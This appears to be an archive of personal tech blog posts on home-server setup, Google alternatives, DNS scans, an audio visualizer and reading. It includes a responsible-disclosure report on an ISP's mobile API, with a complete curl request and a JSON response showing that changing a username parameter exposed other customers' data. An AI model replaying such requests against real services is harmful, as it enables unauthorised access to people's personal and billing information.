Migrating to Wireguard is on my list, but I haven’t found any good documentation on running a hub-spoke network so far. ↩

A records on top level domains

2018-02-09T00:00:00+00:00

Re-ran the same scan as http://blog.towo.eu/a-records-on-top-level-domains/

Scan run from AS9498.

Results:

TLD	IP
ai	209.59.119.34
android	127.0.53.53
arab	127.0.53.53
cal	127.0.53.53
chrome	127.0.53.53
cm	195.24.205.60
dclk	127.0.53.53
dk	193.163.102.58
drive	127.0.53.53
etisalat	127.0.53.53
gg	87.117.196.80
gle	127.0.53.53
guge	127.0.53.53
hangout	127.0.53.53
je	87.117.196.80
nexus	127.0.53.53
pa	168.77.8.43
play	127.0.53.53
pn	80.68.93.100
politie	127.0.53.53
sport	127.0.53.53
tk	217.119.57.22
uz	91.212.89.8
ws	64.70.19.33
谷歌	127.0.53.53
мон	218.100.84.27
мон	202.170.80.40
мон	180.149.98.78
اتصالات	127.0.53.53
政府	127.0.53.53
عرب	127.0.53.53
招聘	127.0.53.53
グーグル	127.0.53.53

Update: An automatically updated version of this is available at https://captnemo.in/tld-a-record/

Migrating from Google (and more)

2017-12-31T00:00:00+00:00

Email
Google Play Music
Google Keep
Phone
LastPass
GitHub

As part of working on my home-server setup, I wanted to move off few online services to ones that I manage. This is a list of what all services I used and what I’ve migrated to .

Why: I got frustrated with Google Play Music a few times. Synced songs would not show up across all clients immediately (I had to refresh,uninstall,reinstall), and I hated the client limits it would impose. Decided to try microG on my phone at the same time, and it slowly came together.

Email

I’ve been using email on my own domain for quite some time (captnemo.in), but it was managed by a Outlook+Google combination that I didn’t like very much.

I switched to Migadu sometime last year, and have been quite happy with the service. Their Privacy Policy, and pro/cons section on the website is a pleasure to read.

Why: Email is the central-point of your online digital identity. Use your own-domain, at the very least. That way, you’re atleast protected if Google decides to suspend your account. Self-hosting email is a big responsibility that requires critical uptime, and I didn’t want to manage that, so went with migadu.

Why Migadu: You should read their HN thread.

Caviats: They don’t yet offer 2FA, but hopefully that should be fixed soon. Their spam filters aren’t the best either. Migadu even has a Drawbacks section on their website that you must read before signing up.

Alternatives: RiseUp, FastMail.

Google Play Music

I quite liked Google Play Music. While their subscription offering is horrible in India, I was a happy user of their “bring-your-own-music” plan. In fact, the most used Google service on my phone happened to be Google Play Music! I switched to a nice subsonic fork called [AirSonic][airsonic], which gives me the ability to:

Listen on as many devices as I want (Google has some limits)
Listen using multiple clients at the same time
Stream at whatever bandwidth I pick (I stream at 64kbps over 2G networks!)

I’m currently using Clementine on the Desktop (which unfortunately, doesn’t cache music), and UltraSonic on the phone. Airsonic even supports bookmarks, so listening to audiobooks becomes much more simpler.

Why: I didn’t like Google Play Music limits, plus I wanted to try the “phone-without-google” experiment.

Why AirSonic: Subsonic is now closed source, and the Libresonic developers forked off to AirSonic, which is under active development. It is supports across all devices that I use, while Ampache has spotty Android support.

Google Keep

I switched across to WorkFlowy, which has both a Android and a Linux app (both based on webviews). I’ve used it for years, and it is a great tool. Moreover, I’m also using DAVDroid sync for Open Tasks app on my phone. Both of these work well enough offline.

Why: I didn’t use Keep much, and WorkFlowy is a far better tool anyway.

Why WorkFlowy: It is the best note-taking/list tool I’ve used.

Phone

I switched over to the microG fork of lineageOS which offers a reverse-engineered implementation of the Google Play Services modules. It includes:

microG Core

Which talks to Google for Sync, Account purposes.

Why: Saves me a lot of battery. I can uninstall this, unlike Google Play Services.

Cons: Not all google services are supported very well. Push notifications have some issues on my phone. See the Wiki for Implementation Status.

UnifiedLP

Instead of the Google Location Provider. I use the Mozilla Location Services, along with Mozilla Stumbler to help improve their data.

Why: Google doesn’t need to know where I am.

Caviats: GALP (Google Assisted Location Provider) does GPS locks much faster in comparision. However, I’ve found the Mozilla Location Services coverage in Bangalore to be pretty good.

Maps

Stil looking for decent alternatives.

Uber

microG comes with a Google Maps shim that talks to Open Street Maps. The maps feature on Uber worked fine with that shim, however booking cabs was not always possible. I switched over to m.uber.com which worked quite well for some time.

Uber doesn’t really spend resources on their mobile site though, and it would ocassionaly stop working. Especially with regards to payments. I’ve switched over to the Ola mobile website, which works pretty well. I keep the OlaMoney app for recharging the OlaMoney wallet alongside.

Uber->Ola switch was also partially motivated by how-badly-run Uber is.

Calendar/Contacts

Most implementations support caldav/carddav for calendar/contacts sync. I’m using DAVDroid for syncing to a self-hosted Radicale Server.

Why: I’ve always had contacts synced to Google, so it was always my-single-source-of-truth for contacts. But since I’m on a different email provider now, it makes sense to move off those contacts as well. Radicale also lets me manage multiple addressbooks very easily.

Why Radicale: I looked around at alternatives, and 2 looked promising: Sabre.io, and Radicale. Sabre is no longer under development, so I picked Radicale, which also happened to have a regularly updated docker image.

Google Play Store

Switch to FDroid - It has some apps that Google doesn’t like, and some more. Moreover, you can use YALP Store to download any applications from the Play Store. You can even run a FDroid repository for the apps you use from Play Store, as an alternative. See this excellent guide on the various options.

Why: Play Store is tightly linked to Google Play Services, and doesn’t play nice with microG.

Why FDroid: FDroid has publicly verifiable builds, and tons of open-source applications.

Why Yalp: Was easy enough to setup.

If you’re looking to migrate to MicroG, I’d recommend going through the entire NO Gapps Setup Guide by shadow53 before proceeding.

LastPass

I’ve switched to pass along with a sync to keybase.

Why: LastPass has had multiple breaches, and a plethora of security issues (including 2 RCE vulnerabilities). Their fingerprint authentication on Android could be bypassed til recently. I just can’t trust them any more

Why pass: It is built on strong crypto primitives, is open-source, and has good integration with both i3 and firefox. There is also a LastPass migration script that I used.

Caviats: Website names are used as filenames in pass, so even though passwords are encrypted, you don’t want to push it to a public Git server (since that would expose the list of services you are using). I’m using my own git server, along with keybase git(which keeps it end-to-end encrypted, even branch names). You also need to be careful about your GPG keys, instead of a single master password.

GitHub

For bonus, I setup a Gitea server hosted at git.captnemo.in. Gitea is a fork of gogs, and is a single-binary go application that you can run easiy.

Just running it for fun, since I’m pretty happy with my GitHub setup. However, I might move some of my sensitive repos (such as this) to my own host.

Why Gitea: The other alternatives were gogs, and GitLab. There have been concerns about gogs development model, and GitLab was just too overpowered/heavy for my use case. (I’m using the home server for gaming as well, so it matters)

If you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:

If you have any comments, reach out to me

Learnings from building my own home server

2017-12-18T00:00:00+00:00

Learnings

I forgot to do this on the last blog post, so here is the list:

archlinux has official packages for intel-microcode-updates.
wireguard is almost there. I’m running openvpn for now, waiting for the stable release.
While traefik is great, I’m concerned about the security model it has for connecting to Docker (uses the docker unix socket over a docker mounted volume, which gives it root access on the host). Scary stuff.
Docker Labels are a great signalling mechanism. Update: After seeing multiple bugs with how traefik uses docker labels, they have limited use-cases but work great in those. Don’t try to over-architect them for all your metadata.
Terraform still needs a lot of work on their docker provider. A lot of updates destroy containers, which should be applied without needing a destroy.
I can’t proxy gitea’s SSH authentication easily, since traefik doesn’t support TCP proxying yet.
The docker_volume resource in terraform is useless, since it doesn’t give you any control over the volume location on the host. (This might be a docker limitation.)
The upload block inside a docker_container resource is a great idea. Lets you push configuration straight inside a container. This is how I push configuration straight inside the traefik container for eg:
```
upload {
  content = "${file("${path.module}/conf/traefik.toml")}"
  file    = "/etc/traefik/traefik.toml"
}
```

Advice

This section is if you’re venturing into a docker-heavy terraform setup:

Use traefik. Will save you a lot of pain with proxying requests.
Repeat the ports section for every IP you want to listen on. CIDRs don’t work.

If you want to run the container on boot, you want the following:

 restart = "unless-stopped"
 destroy_grace_seconds = 10
 must_run = true

If you have a single docker_registry_image resource in your state, you can’t run terraform without internet access.
Breaking your docker module into images.tf, volumes.tf, and data.tf (for registry_images) works quite well.
Memory limits on docker containers can be too contrained. Keep an eye on logs to see if anything is getting killed.
Setup Docker TLS auth first. I tried proxying Docker over apache with basic auth, but it didn’t work out well.

MongoDB with forceful server restarts

Since my server gets a forceful restart every few days due to power-cuts (I’m still working on a backup power supply), I faced some issues with MongoDB being unable to recover cleanly. The lockfile would indicate a ungraceful shutdown, and it would require manual repairs, which sometimes failed.

As a weird-hacky-fix, since most of the errors were from the MongoDB WiredTiger engine itself, I hypothesized that switching to a more robust engine might save me from these manual repairs. I switched to MongoRocks, and while it has stopped the issue with repairs, the wiki stil doesn’t like it, and I’m facing this issue: https://github.com/Requarks/wiki/issues/313

However, I don’t have to repair the DB manually, which is a win.

SSHD on specific Interface

My proxy server has the following

eth0 139.59.22.234

And an associated Anchor IP for static IP usecases via Digital Ocean. (10.47.0.5, doesn’t show up in ifconfig).

I wanted to run the following setup:

eth0:22 -> sshd
Anchor-IP:22 -> simpleproxy -> gitea:ssh

where gitea is the git server hosting git.captnemo.in. This way:

I could SSH to the proxy server over 22
And directly SSH to the Gitea server over 22 using a different IP address.

Unfortunately, sshd doesn’t allow you to listen on a specific interface, and since the eth0 IP is non-static I can’t rely on it.

As a result, I’ve resorted to just using 2 separate ports:

22 -> simpleproxy -> gitea:ssh 222 -> sshd

There are some hacky ways around this by creating a new service that boots SSHD after network connectivity, but I thought this was much more stable.

Wiki.js public pages

I’m using wiki.js setup at https://wiki.bb8.fun. A specific requirement I had was public pages, so that I could give links to people for specific resources that could be browser without a login.

However, I wanted the default to be authenticated, and only certain pages to be public. The config for this was surprisingly simple:

YAML config

You need to ensure that defaultReadAccess is false:

auth:
  defaultReadAccess: false
  local:
    enabled: true

Guest Access

The following configuration is set for the guest user:

Now any pages created under the /public directory are now browseable by anyone.

Here is a sample page: https://wiki.bb8.fun/public/nebula

Docker CA Cert Authentication

I wrote a script that goes with the docker TLS guide to help you setup TLS authentication

OpenVPN default gateway client side configuration

I’m running a OpenVPN configuration on my proxy server. Howver, I don’t always want to use my VPN as the default route, only when I’m in an untrusted network. I still however, want to be able to connect to the VPN and use it to connect to other clients.

The solution is two-fold:

Server Side

Make sure you do not have the following in your OpenVPN server.conf:

push "redirect-gateway def1 bypass-dhcp"

Client Side

I created 2 copies of the VPN configuration files. Both of the them have identical config, except for this one line:

redirect-gateway def1

If I connect to the VPN config using this configuration, all my traffic is forwarded over the VPN. If you’re using Arch Linux, this is as simple as creating 2 config files:

/etc/openvpn/client/one.conf
/etc/openvpn/client/two.conf

And running systemctl start openvpn-client@one. I’ve enabled my non-defaut-route VPN service, so it automatically connects to on boot.

If you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:

If you have any comments, reach out to me

Running terraform and docker on my home server

2017-11-09T00:00:00+00:00

The last time I’d posted about my Home Server build in September, I’d just gotten it working. Since then, I’ve made a lot of progress. It is now running almost 10 services, up from just Kodi back then. Now it has a working copy of:

Kodi

I was running kodi-standalone-service, set to run on boot, as per the ArchLinux Wiki, but switched in favor of openbox to a simple autorun.

Steam

The current setup uses Steam as the application launcher. This lets me ensure that the Steam Controller works across all applications.

Openbox

Instead of running Kodi on xinit, I’m now running openbox with autologin against a non-privileged user.

PulseAudio

I tried fighting it, but it was slightly easier to configure compared to dmix. Might move to dmix if I get time.

btrfs

I now have the following disks:

128GB root volume. (Samsung EVO-850)
1TB volume for data backups
3TB RAID0 configuration across 2 disks. There are some btrfs subvolumes in the 3TB raid setup, including one specifically for docker volumes. The docker guide recommends running btrfs subvolumes on the block device, which I didn’t like, so I’m running docker volumes in normal mode on a btrfs disk. I don’t have enough writes to care much yet, but might explore this further.

Docker

This has been an interesting experiment. Kodi is still installed natively, but I’ve been trying to run almost everything else as a docker container. I’ve managed to do the configuration entirely via terraform, which has been a great learning experience. I’ve found terraform much more saner as a configuration system compared to something like ansible, which gets quite crazy. (We have a much more crazy terraform config at work, though).

Terraform

I have a private repository on GitLab called nebula which I use as the source of truth for the configuration. It doesn’t hold everything yet, just the following:

Docker Configuration (not the docker service, just the container/volumes)
CloudFlare - I’m using bb8.fun as the root domain, which is entirely managed using the CloudFlare terraform provider.
MySQL - Running a MariaDB container, which has been configured by-hand till this PR gets merged.

Gitea

Running as a docker container, provisioned using terraform. Plan to proxy this using git.captnemo.in.

Emby

Docker Container. Nothing special. Plan to set this up as the Kodi backend.

Couchpotato

Experimental setup for now. Inside a docker container.

Flexget

I wish I knew how to configure this. Also inside docker.

traefik

Running as a simple reverse proxy for most of the above services

elibsrv

A simple OPDS server, which I use against my Kindle. If you don’t know what OPDS is, you should [check this out][]. Running on a simple apache setup on the archlinux box for now. WIP for dockerization.

ubooquity

Simple ebook server. Proxied over the internet. Has a online ebook reader, which is pretty cool.

MariaDB

I set this up planning to shift Kodi’s data to this, but now that I have emby setup - I’m not so sure. Still, keeping this running for now.

Transmission

Hooked up to couchpotato,flexget, and sickrage so it can do things.

Sickrage

Liking this more than flexget so far, much more easier to configure and use.

AirSonic

This is the latest fork of libresonic, which was itself forked off subsonic. My attempt at getting off Google Play Music.

Learnings

Moved these to a separate blog post

TODO

A few things off my TODO list:

Create a Docker image for elibsrv that comes with both ebook-convert and kindlegen pre-installed
~~Do the same for ubooquity as well~~ (Using the linuxserver/ubooquity docker image)

If you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:

If you have any comments, reach out to me

Home Server Build

2017-09-17T00:00:00+00:00

I’d been planning to run my own home server for a while, and this culminated in a mini-ITX build recently. The current build configuration is available at /setup/homeserver/.

In no particular order, here were the constraints:

The case should be small (I preferred the Elite 110, but it was unavailable in India).
Dual LAN, if possible (decided against it at the end). The plan was to run the entire home network from this directly by plugging in the ISP into the server.
Recent i3/i5 for amd64 builds.
Enough SATA bays in the cabinet for storage

The plans for the server:

Scheduled backups from other sources (Android/Laptop)
Run Kodi (or perhaps switch to Emby)
Run torrents. Transmission-daemon works. Preferably something pluggable and that works with RSS
Do amd64 builds. See https://github.com/captn3m0/ideas#arch-linux-package-build-system
Host a webserver. This is primarily for serving resources off the internet
- Host some other minor web-services
- A simple wiki
- Caldav server
- Other personal projects
Sync Server setup. Mainly for the Kindle and the phone.
Calibre-server, koreader sync server for the Kindle
- Now looking at libreread as well
Tiny k8s cluster for running other webapps
Run a graylog server for sending other system log data (using papertrail now, has a 200MB limit)

No plans to move mail hosting. That will stay at migadu.com for now.

I had a lot of spare HDDs that I was going to re-use for this build:

WD MyBook 3TB (external, shelled).
Seagate Expansion: 1TB
Seagate Expansion 3TB (external, shelled)
Samsung EVO 128GB SSD

The 2x3TB disks are setup with RAID1 over btrsfs. Important data is snapshotted to the other 1TB disk using btrfs snapshots and subvolumes. In total giving me ~4TB of storage.

Software

Currently running kodi-standalone-service on boot. Have to decide on a easy-to-use container orchestration platform. Choices as of now are:

Rancher
Docker Swarm
Shipyard
Terraform
Portainer

Most of these are tuned for multi-host setups, and bring in a lot of complexity as a result. Looking at Portainer, which seems well suited to a single-host setup.

Other services I’m currently running:

elibsrv. Running a patched build with support for ebook-convert
ubooquity for online reading of comics

If you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:

If you have any comments, reach out to me

Project Updates

2017-09-16T00:00:00+00:00

Over the last couple of years, I’ve been involved with lots of side projects, both online and offline. Some of them, I’ve written about on the blog, like my music visualizer project. A few of them, got their own project page, like the website for my niece (but no blog post) while some didn’t even get a mention. I thought I’d write about the many-many side projects I’ve started (and abandoned). You might also wanna visit the /projects page for the larger projects.

Home Server Build: Sep 2017 Built a home server, mostly as a HTPC but also as a learning exercise for managing services over Docker.
Sushi Go: Summer 2017 This is a work-in-progress conversion of Sushi Go (original), the popular card game by Gamewright into Ruby.
youtube-ripper: June 2017 Downloads music-compilations from YouTube and rips them into multiple tagged MP3 files.
cosmere-books: September 2017 Wrote a EPUB generator for multiple books in the Cosmere. Currently covers 4 different serializations at Tor.com. Also created a project page on all of my ebooks projects at /ebooks/
ideas: Ongoing I maintain a CC0 licensed list of personal ideas. Feel free to use.
spectrumyzer: May 2017 Created an animated wallpaper using spectrumyzer. Wrote a blog post about it.
google-sre: Feb/Sep 2017 EPUB generator for the Google SRE ebook. Started in February in Python. Gave up and redid it properly in September.
CodeChef Offline: March 2012 I attempted to make a offline repository for CodeChef problems. I spent some time in May 2017 upgrading the project with a cleaner scraper and a Jekyll base.
Hoshruba: June 2015 I wrote a script that scraped Tor’s serialized publication of the first book in Hoshruba series to generate EPUB and MOBI files. I would recommend the book if you are interested in reading what many would term the “original fantasy book”
HackerTray: December 2013 - I wrote a Linux PyGTK application that sits in your taskbar using Indicator Applet to show you the latest stories from Hacker News. Looking for a maintainer.
MagicMuggle: May 2017 I wrote a script to convert Magic Muggle (A Harry Potter fanfic about a muggle who accidentally gets into Hogwarts) books from their original reddit posts to EPUB and MOBI files.
Kerala IT Policy: March 2017 Attempted to transcribe the draft IT policies put up by the Government of Kerala. Lots of OCR followed by manual fixes. I stopped working on this when I realized that the government had actually put up a really nice website for this (with clear plaintext, not the bad PDF I was using as the source).
lightsaber: August 2015 I created a DNS based HTTP-3xx redirect service. Useful if you own a domain and you want it to be redirected, but don’t have a webserver with you. Made as part of the Django Hackathon organized by HackerEarth in Ruby.
HackerCouch: November 2015 My hack during hackbeach 2015. Created something best described as “couchsurfing for hackers”. Simple Jekyll/Ruby website hosted on GitHub Pages.

Building the perfect audio visualization

2017-05-01T00:00:00+00:00

I made this as my animated wallpaper recently (Click to play/pause):

above video has a audio component, click at your own peril.

What follows is the story and the tech behind making this.

The Wallpaper

I have a long history of using custom wallpapers. This was my wallpaper from 2014-:

When I asked Vikalp to design a new one, I knew I wanted something that was slightly more softer. This is what he came up with, after a few iterations:

This wasn’t the final iteration, and both of us agreed that there was something missing.

Visualizations

I saw a colleague using cava and spent a bit of time trying out different visualization software. The ones that I tried out:

cava: works perfectly with i3, runs on a terminal. I couldn’t get it to work cleanly with transparency.
mildrop: Winamp’s legacy. This works great for parties, but is not really an everyday-use visualizer.
spectrumyzer: Worked with transparency, but limited to bars visualization.

I decided to go ahead with Spectrumyzer (This is the default config):

The Traffic Jam

The very same day, stuck in a traffic jam¹, I asked Vikalp for some color ideas on the visualization.

The obvious 2 were tried first:

It finally dawned on us to use the light blue variant with padding set to zero:

Here is one showing the actual positioning (set using the offsets):

Bezier Curves

With the padding set to zero, it already looked great. I ended up using this as my wallpaper for the next one week. Vikalp wanted to make the bars non-rectangular, and I spent some time figuring out how to make waveforms using bezier curves². The basic learning from my experiments were:

Cairo has methods for drawing cubic bezier curves.
Cubic bezier curves have 2 control points.
The control points must be symmetric (equidistant) as well as parallel to the origin points.
The parallel part ensures that the ending and starting line segments are always tangential giving a smooth joining.

This is roughly what you want to do when drawing waveforms:

If you are interested in playing around with Bezier curves, see Animated Bézier Curves. A Primer on Bézier Curves is a math-heavy explanation if you want to read further³.

The code I wrote picks the midpoints of the bars and then connects them using bezier curves:

# control point cords
# Make sure these are symmetric
c1x = rect_top_mid_x + 16
c2x = next_rect_top_mid_x - 16
c1y = rect_top_mid_y
c2y = next_rect_top_mid_y

I also had to make the number of bars configurable (this is default=64, which doesn’t look great):

Here is the complete final result in HD:

What I learned

Bezier curves are not magic.
Drawing pixels on screen and filling them was quite easy with Cairo and Python.
Coding is wizardry. The things that I take for granted every day (take a multi-page website and get useful tabular data out of it, for eg) are unthinkable for most people. The idea of doing water waves was something I knew would be possible before I even looked at the codebase.

If you’d like to replicate this setup, or build upon it, here is my spectrum.conf file. I also filed a PR (now merged!) to the spectrumyzer project adding support for curve based renders.

Sony World Junction - Where startup ideas are born. ↩
The Spectrumyzer codebase turned out to be fairly easy to understand. It was just cairo and pyGTK. ↩
A Primer on Bézier Curves was published on HN just a few days after I finished this project. ↩

Book Review (2016)

2017-04-02T00:00:00+00:00

I tweeted this a while back about my reading progress in 2016, and thought I’d do a post about what I read.

Made a graph of my @goodreads reading progress in 2016. I only picked up the pace sometime in May, but managed to read ~10k pages this year.

— Nemo (@captn3m0) January 13, 2017

Continuing with the review tradition from last year, here are the top 3 books that I read in 2016:

The Library at Mount Char [review]
Binti (Hugo winner for Best Novella, SF)
Lolita

Other books that I enjoyed were “Bands of Mourning”, the 3rd book in Mistborn Era 2, and the Powder Mage Trilogy which I found hard to put down.

I decided to aim for 36 books in 2016 (as well as 2017 now), and crossed that nicely. I picked 36 because it corresponds to 3 books a month or 1 book every 10 days, which makes for a goal that is easily tracked. I count everything that goodreads might count as a book (which is both good and bad), but I stick to it. Far more important for me would be the page count, which I charted at the end of the year and I read ~830 pages a month, which I’m pretty happy with.

I’m hoping to read more technical books in 2017, and have made some progress on that front with re-reading SICP.

If you are interested in the script that generated the graph, you can find it on github.

Vulnerability Report: ACT Corp

2017-03-26T00:00:00+00:00

ACT, for those who don’t know is one of India’s most popular broadband providers.

This is a very brief and concise summary.

ACT has a mobile application
That allows you to login and check your plan details, data usage etc
I’ve been wanting to build a command line application that lets me check the balance easily
I tried scripting their website, but it was too much javascript.
The mobile app uses an API to do the same
The API happens to have really bad auth
Got fixed almost 3 months after reporting this.

Request

curl https://myfibernet.actcorp.in/api/user/plandetails -H "Content-Type: application/json" -H "Authtoken: 2aee21dfb1ef77707c30f48ccc513ad60b74d1fc6a84d60ecc32323ab5941469" -H "Apiversion: 1.0" -H "Appversion: 32" -H "Devicetype: 1" -H "Deviceid: 68590327e3e0ca81" -H "Mobilenumber: 9999999999" -H "Mid: 8973808103928d98703e65c0106b7a9d4001886234afbc2d7ce6415b75f9c216" --data '{"username":"11111111"}'

The API responds back with the following:

{
  "code": 200,
  "status": true,
  "message": "Success",
  "data": {
    "plan_details": {
      "agreement_info": {
        "agreement_no": "XXXXXXXXXX",
        "promotion_code": "",
        "package_code": "ACTESS01M",
        "package_name": "",
        "agreement_startdate": "DD/MM/YYYY",
        "expiry_date": "",
        "status": "",
        "entity_code": "[]",
        "subscription_period": "[]",
        "payterm": "[]",
        "billingcycle_code": "[]",
        "contract_type": "ISP",
        "outlets": "1",
        "service_points": "",
        "package_tenure": int,
        "due_date": ""
      },
      "product_info": {
        "product_code": "",
        "product_desc": ""
      }
    },
    "plan_usage_info": {
      "service_id": "ACTESS01M",
      "service_name": "ACTESS01M",
      "outbyteslimit": 322122547200,
      "outbytesremaining": 153400581140,
      "outbytesused": 168721966060
    },
    "bill_info": {
      "accountno": "111111112233",
      "subscribername": "NAME",
      "phonenumber": "PHONENUMBER",
      "address": {
        "line1": "YUP",
        "line2": "THESE TWO LINES WERE FILLED",
        "line3": "",
        "district": "AND THIS",
        "city": "BANGALORE",
        "state": "KARNATAKA",
        "country": "India"
      },
      "billno": "10000001111",
      "billdate": "DD/MM/2016",
      "account_period": "01/MM/2016-30/MM/2016",
      "previous_due": "",
      "current_invoice_amt": "1234",
      "total_due": "0",
      "bill_due_date": "15 Nov 2016"
    }
  }
}

Some of these are empty fields, and some values that I didn’t understand I’ve replaced with [].

The fun part is that the request is actually a POST and contains the following data:

{"username":"11111111"}

I happen to have friends who also use ACT. I asked around for usernames, and just by changing this one parameter in the request, I could access the complete details of almost everyone else.

Almost everyone, because for certain cases, I get a valid empty response. Valid because it has the same schema, but empty because all values are empty strings. Don’t know what that happens consistently only for certain accounts. (One of these was a Hyd account, the other in BLR).

If you are interested I’m working on a simple API that lets you access the ACT API to check the same details. It would ask you for an OTP the first time you login, and then cache the credentials to let you check the balance easily.

~~I’ve reported this to ACT as soon as I found it. Will disclose after I’ve given them some time!~~

Update: This was reported and fixed by ACT after I managed to find a contact via an investor (really!).

Timeline

Date	Details
29 Nov 2016	Vulnerability Identified
29 Nov 2016	Email sent to ACT, no response
6 Dec 2016	Email sent with partial customer details to explain scope of the issue, no response
8 Dec 2016	Reminder sent, no response
20 Jan 2017	Another reminder with a writeup sent. I also set a deadline of 29th January (2 months since first contact). Also got in touch with CERT-IN. No response
23 Jan 2017	Accidentally an investor in ACT saw my tweet and responded over twitter. Send a writeup, along with the suggestion to take down the application
24 Jan 2017	ACT reports issue is fixed. I test and report back as fixed the next day
26 Mar 2017	Report published

However, the huge timeline involved here pretty much guarantees that if you are an ACT customer, your data is out there in the public.

CCTC Challenge VM

2017-03-25T00:00:00+00:00

This is specifically about the contest held in 2011, 6 years ago. I’ve written about my experience during the contest on this blog.

More specifically, Round 2 of the contest was a pentesting scenario where we were only provided with a VM image and asked to test it and report any vulnerabilities that we found.

I recently found the VirtualBox images, and thought I’d share them as a easy intro to web security.

Instructions

Reach out to me for the VM image
Hack.
Credentials are student:student (username:password)
Open /cctc in your browser.

Rules

Only application and its serving components can be tested for vulnerabilities. The serving components include
- Webserver
- Operating System
- Any other services/files in the guest machine and guest operating system
Any vulnerability identified in any component outside the above mentioned ones, will not be used for evaluation
All participants should necessarily submit all the exploit codes/custom scripts written to identify the vulnerabilities in the system.
The deadline for the original challenge was 2 weeks, but you’re free to take as much time as you want. Feel free to publish a list of vulnerabilities you find.

The attached spreadsheet provides format of the report, challenges in scope, and the details to be filled out for each vulnerability identified.

The tasks to be performed are mentioned in the report. Each task consists of the following sections:

Vulnerability/Vulnerabilities - You need to write the description of the vulnerability
Root Cause(s) - What is the root cause of the vulnerability?
Approach adopted (Steps with screenshots) – Write the steps followed to exploit the vulnerability along with screenshot of the final screen and/or intermediate steps.
Remediation with sample code snippet – Write the remediation steps to address this vulnerability. Also, write the sample code if applicable.

Also attached is a step by step installation guide for application set-up.

Few points to be considered:

Challenges can be attempted and completed in any order.
Only the application and its serving components can be tested for vulnerabilities. All other components like VMware, if tested for security issues, would lead to disqualification.
I will not be responsible for the discovery/notification of any zero day vulnerability in any software. If any zero-day vulnerability is identified, it is the responsibility of the concerned participant to notify the vulnerability to the respective vendor as per vendor’s policy.

If you are really interested, you can find a copy of the report we submitted at /reports/cctc.

Thanks to Harshil and Shobhit for working alongside on this.

2015 in Review

2016-02-15T00:00:00+00:00

2015 was a good year for me. I accomplished a lot of things, and was happy for most part of the year. In no particular order, here are the things that stand out for me:

Went to HillHacks, and made lots of friends. Helped organize the conference.
Joined Razorpay in June
Moved to Bangalore
Announced my book, The Joy of Software Development
Did lots of speaker things:
- Joy of Software Development talk at IIT Roorkee
- Flash Talks on SDSLabs, CTFs and a few more things at HillHacks
- A full-length talk on the book itself at HillHacks
- Did the HillHacks and HackBeach quizes
- Announced my Homeopathy Bug Bounty Program at hackbeach.
- Gave a talk on Fun with HTTP at Barcamp Bangalore.
Learnt some slacklining at hackbeach. Helped with conference scheduling as well.
Made lots of new friends at Bangalore.
Started playing board games, including being a DM at several Dungeons and Dragons sessions.
Started quizzing in bangalore as well. Mostly at Cluesday, Vapors.

Reading

I started with a goal of 20 books for this year, and ended up reading about 28. Tried experimenting with Audiobooks near the year end, and failed. Bought a Kindle paperwhite as well. I tend to read a lot of Fantasy and SF, and this continued in 2015 as well. The best books I read this year (in order):

Lions of Al Rassan [review]
The Goblin Emperor [review]
The Martian [review]

A complete list is on Goodreads

Tech

Launched hackercouch as a personal project.
Shifted to Arch Linux + i3wm setup for my laptop. See Setup page for more details.
Left facebook, mostly because of their stance on Net Neutrality and the FreeBasics debacle in India.

How to get better at software development?

2015-10-12T00:00:00+00:00

I often get a lot of queries from people asking me about how to get started with software development, and how to get better at it. My replies are almost reaching stock-level worthy of copy-paste now, so I thought I might as well write about it publicly.

What follows is a list of advice I’d give to any person who wants to write software for a living. A lot of it might apply across professions, and a lot of it is tailored to students in universtities. Not everything might apply in your case, YMMV. Take everything with a pinch of salt. Feedback is welcome.

Join a community.

Highly preferable if its an IRL (In-real-life) community rather than just a chatroom somewhere, but even those are preferable over nothing. Communities have this shared sense of learning, that you don’t enjoy anywhere else. Passive learning is something I talk a lot about, and it only happens because of chance interactions that happen in communities. Even online communities work fairly well, and by online communities I mean places like StackOverflow, AskUbuntu, ServerFault, HackerNews, subreddits etc. If you don’t have a physical community near you that you can join, maybe its time to start one?
Contribute to Open Source projects

It doesn’t have to be with your code, or even a large project. Even small javascript npm modules that you might think can be improved deserve some Pull Request love.
Write all code publicly

Your code not being public should be the exception, not the norm. I’ve found putting almost all my code on github fairly liberating. I keep all my OS configuration and a lot of other things on github.
Do tech talks

It doesn’t have to be at a big-name conference, but maybe at a small meetup around you. Good conferences will sponsor your tickets, and as a plus, you get to attend all the talks at that conference for free. Just make sure that you actually do know what you’re talking about, unlike a lot of talks that happen. The level of knowledge expected of a speaker is far more, and as a result if you are the one talking about something, you need to get better at it and understand it better, which is a great way of forcing yourself to learn something.
Stay Updated

Reading Hacker News is a fairly certain way of making sure of that. A person doing PHP development should be aware of things like Composer, HHVM, and perhaps the upcoming changes in PHP7 (They’re awesome). As a technologist, part of our job is to stay updated with trends (no matter how insane the JS framework wars sound). The code you will be writing 5 years from now will be in an entirely different framework than what you are using today. This doesn’t mean that you should start learning the ins and outs of every JS framework, but rather that you should be tangentially aware of developments happening in the space. (For eg, following stable updates of Rails even though you are not a Rails developer).
Learn more languages

I am a proud polyglot, and I very often realize that knowing more than one language changes your style and more importantly your thinking process significantly. For eg, a Ruby programmer will be fairly comfortable with the idea of metaprogramming compared to a PHP developer, and even more so when it might come to DSL (Domain Specific Languages). Similarly, knowing Haskell or Functional Programming in general teaches you a lot of things that you might re-use back in your JavaScript world.
This doesn’t happen unless you know more than one language. Moreoever, its always helpful to have JavaScript as your second language (if you are looking for one), because of its monopoly in front-end development. A lot of technologies (like CORS/JSONP) just don’t make sense unless you understand JavaScript.
Concepts Matter

